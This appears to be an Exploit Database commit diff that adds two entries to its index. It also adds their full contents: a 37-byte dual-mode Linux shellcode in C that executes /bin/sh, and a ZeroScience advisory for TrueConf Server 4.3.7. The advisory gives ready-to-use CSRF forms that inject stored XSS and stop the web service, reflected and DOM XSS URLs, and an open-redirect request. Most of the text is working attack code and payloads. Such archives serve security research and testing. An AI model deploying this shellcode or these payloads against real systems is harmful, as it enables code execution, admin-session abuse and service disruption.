DB: 2017-01-30

2 new exploits

Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)

TrueConf Server 4.3.7 - Multiple Vulnerabilities

files.csv

@@ -15853,6 +15853,7 @@ id,file,description,date,author,platform,type,port
 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86_64 - Bind 5600 TCP Port - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37114,3 +37115,4 @@ id,file,description,date,author,platform,type,port
 41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
 41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
 41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
+41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0

platforms/linux/shellcode/41183.c

@@ -0,0 +1,79 @@
+/**
+  Copyright © 2017 Odzhan. All Rights Reserved.
+
+  Redistribution and use in source and binary forms, with or without
+  modification, are permitted provided that the following conditions are
+  met:
+
+  1. Redistributions of source code must retain the above copyright
+  notice, this list of conditions and the following disclaimer.
+
+  2. Redistributions in binary form must reproduce the above copyright
+  notice, this list of conditions and the following disclaimer in the
+  documentation and/or other materials provided with the distribution.
+
+  3. The name of the author may not be used to endorse or promote products
+  derived from this software without specific prior written permission.
+
+  THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
+  IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+  WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+  DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
+  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+  (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+  SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+  HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+  STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
+  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+  POSSIBILITY OF SUCH DAMAGE. */
+  
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+
+#include <sys/mman.h>
+
+#define SHX_SIZE 37
+
+char SHX[] = {
+  /* 0000 */ "\x31\xf6"                     /* xor esi, esi                    */
+  /* 0002 */ "\xf7\xe6"                     /* mul esi                         */
+  /* 0004 */ "\x52"                         /* push rdx                        */
+  /* 0005 */ "\x52"                         /* push rdx                        */
+  /* 0006 */ "\x52"                         /* push rdx                        */
+  /* 0007 */ "\x54"                         /* push rsp                        */
+  /* 0008 */ "\x5b"                         /* pop rbx                         */
+  /* 0009 */ "\x53"                         /* push rbx                        */
+  /* 000A */ "\x5f"                         /* pop rdi                         */
+  /* 000B */ "\xc7\x07\x2f\x62\x69\x6e"     /* mov dword [rdi], 0x6e69622f     */
+  /* 0011 */ "\xc7\x47\x04\x2f\x2f\x73\x68" /* mov dword [rdi+0x4], 0x68732f2f */
+  /* 0018 */ "\x40\x75\x04"                 /* jnz 0x1f                        */
+  /* 001B */ "\xb0\x3b"                     /* mov al, 0x3b                    */
+  /* 001D */ "\x0f\x05"                     /* syscall                         */
+  /* 001F */ "\x31\xc9"                     /* xor ecx, ecx                    */
+  /* 0021 */ "\xb0\x0b"                     /* mov al, 0xb                     */
+  /* 0023 */ "\xcd\x80"                     /* int 0x80                        */
+};
+
+void xcode(char *s, int len)
+{
+  void *bin;
+
+  bin=mmap (0, len, 
+      PROT_EXEC | PROT_WRITE | PROT_READ, 
+      MAP_ANON  | MAP_PRIVATE, -1, 0);  
+
+  memcpy (bin, s, len);
+  
+  // execute
+  ((void(*)())bin)();
+    
+  munmap (bin, len);  
+}
+
+int main(void)
+{
+  xcode (SHX, SHX_SIZE);
+  return 0;  
+}
+

platforms/php/webapps/41184.txt

@@ -0,0 +1,132 @@
+TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
+
+
+Vendor: TrueConf LLC
+Product web page: https://www.trueconf.com
+Affected version: 4.3.7.12255 and 4.3.7.12219
+
+Summary: TrueConf Server is a powerful, high-quality and highly secured
+video conferencing software server. It is specially designed to work with
+up to 250 participants in a multipoint conference over LAN or VPN networks.
+TrueConf Server requires no hardware and includes client applications for
+all popular platforms, making it an easy-to-set up, unified communications
+solution.
+
+Desc: The administration interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+Input passed via the 'redirect_url' GET parameter is not properly verified before
+being used to redirect users. This can be exploited to redirect a user to an
+arbitrary website e.g. when a user clicks a specially crafted link to the affected
+script hosted on a trusted domain.
+
+TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
+input passed via several parameters to several scripts is not properly sanitized
+before being returned to the user. This can be exploited to execute arbitrary HTML
+and script code in a user's browser session in context of an affected site.
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+           Apache/2.4.17 (Win32)
+           PHP/5.4.41
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2017-5393
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
+
+
+01.11.2016
+
+--
+
+
+CSRF Stored XSS:
+----------------
+
+<html>
+  <body>
+    <form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
+      <input type="hidden" name="send&#95;invite&#95;mail" value="1" />
+      <input type="hidden" name="invitation&#95;type" value="&#45;1" />
+      <input type="hidden" name="hide&#95;invitation&#95;type" value="&#45;1" />
+      <input type="hidden" name="date" value="22&#46;01&#46;2017" />
+      <input type="hidden" name="time&#45;field" value="17&#58;27" />
+      <input type="hidden" name="time&#95;zone" value="60" />
+      <input type="hidden" name="subtype" value="3" />
+      <input type="hidden" name="podiums" value="6" />
+      <input type="hidden" name="cid" value="&#92;c&#92;dfa95f7e1d" />
+      <input type="hidden" name="key" value="dfa95f7e1d" />
+      <input type="hidden" name="topic" value="<script>alert&#40;&apos;XSS&apos;&#41;<&#47;script>" />
+      <input type="hidden" name="description" value="" />
+      <input type="hidden" name="owner" value="" />
+      <input type="hidden" name="gconf&#45;edit" value="ok" />
+      <input type="hidden" name="webTtype" value="0" />
+      <input type="submit" value="Submit form" />
+    </form>
+  </body>
+</html>
+
+
+
+Reflected XSS:
+--------------
+
+http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
+http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
+http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
+http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
+
+
+
+DOM XSS:
+--------
+
+http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
+http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
+
+
+
+Open Redirect:
+--------------
+
+Request:
+
+GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
+Host: 127.0.0.1:8888
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Accept: */*
+
+Response:
+
+HTTP/1.1 302 Found
+Date: Thu, 22 Sep 2016 21:15:40 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Location: http://www.zeroscience.mk
+Content-Length: 0
+Keep-Alive: timeout=5, max=75
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+
+
+
+CSRF Stop Web Service:
+----------------------
+
+<html>
+  <body>
+    <form action="http://127.0.0.1/admin/service/stop/" method="POST">
+      <input type="submit" value="Submit form" />
+    </form>
+  </body>
+</html>